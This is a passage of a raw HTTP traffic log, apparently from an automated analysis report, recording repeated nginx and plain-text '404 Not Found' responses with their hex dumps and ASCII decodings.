                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:57:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:57:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:57:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:16 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:16 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Nov 2024 08:58:18 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Nov 2024 08:58:18 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:24 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:24 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Nov 2024 08:58:43 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Nov 2024 08:58:44 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:50 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 